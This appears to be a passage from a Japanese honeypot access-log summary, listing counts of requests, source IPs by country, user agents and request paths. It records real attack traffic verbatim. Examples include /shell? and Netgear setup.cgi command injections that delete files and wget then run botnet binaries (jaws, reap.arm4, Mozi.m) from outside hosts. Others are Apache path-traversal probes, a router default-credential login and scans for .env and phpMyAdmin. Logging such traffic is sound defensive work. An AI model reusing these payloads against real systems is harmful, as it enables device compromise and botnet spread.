1	GET	`/base.shtml`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/default.jsa`	HTTP/1.1
1	GET	`/default.php`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/download/file.ext`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/home.jhtml`	HTTP/1.1
1	GET	`/home.jsa`	HTTP/1.1
1	GET	`/home.shtml`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.aspx`	HTTP/1.1
1	GET	`/index.cgi`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/indice.asp`	HTTP/1.1
1	GET	`/indice.cgi`	HTTP/1.1
1	GET	`/indice.jsp`	HTTP/1.1
1	GET	`/indice.php`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/inicio.aspx`	HTTP/1.1
1	GET	`/inicio.cgi`	HTTP/1.1
1	GET	`/inicio.shtml`	HTTP/1.1
1	GET	`/localstart.asp`	HTTP/1.1
1	GET	`/localstart.cfm`	HTTP/1.1
1	GET	`/localstart.html`	HTTP/1.1
1	GET	`/localstart.pl`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/mPlayer`	HTTP/1.1
1	GET	`/main.cfm`	HTTP/1.1
1	GET	`/main.jhtml`	HTTP/1.1
1	GET	`/menu.jsa`	HTTP/1.1
1	GET	`/mysql/scripts/setup.php`	HTTP/1.1
1	GET	`/nmaplowercheck1663890486`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/s/3133322e3134352e36362e3334/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
2	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 206.189.9.123/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/start.jhtml`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/z7u6`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
2	HEAD	`/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
2	20.125.147.122	United States
5	20.171.106.193	United States
1	36.110.214.194	China
4	43.143.49.112	China
1	45.164.20.117	Mexico
2	45.227.254.26	Belize
26	51.79.29.48	Canada
1	51.132.243.128	United Kingdom
1	64.62.197.163	United States
1	66.85.173.54	United States
1	79.110.62.205	Bulgaria
1	82.53.38.75	Italy
3	103.146.140.151	Hong Kong
1	104.149.131.207	United States
1	122.194.11.74	China
4	128.14.141.34	United States
2	152.89.196.211	Russia
1	156.208.32.25	Egypt
7	159.65.42.31	United States
13	164.92.156.5	United States
1	181.214.218.69	United States
1	192.241.205.171	United States
1	192.241.216.48	United States
1	193.46.255.41	Romania
2	194.165.16.71	Panama
1	205.210.31.31	United States
1	205.210.31.58	United States

UserAgent一覧

件数	UserAgent
28	`-`
2	`Hello, world`
6	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 zgrab/0.x`
1	``
1	`curl/7.29.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
5		`\x03`
13		`\x16\x03\x01`
1		`\xaa\xfa\xa2\xac-_P\x9a!\xbc\x8b`
1		`\xff\\As?U0W`
29	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/phpmyadmin4.8.5/index.php`	HTTP/1.1
1	GET	`/pma/scripts/setup.php`	HTTP/1.1
1	GET	`/pmd/index.php`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//102[.]33[.]41[.]129:50821/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 91.218.67.179/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4`
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/wp-login.php/`	HTTP/1.1
1	GET	`http[:]//13[.]67[.]44[.]234:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/48423327`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1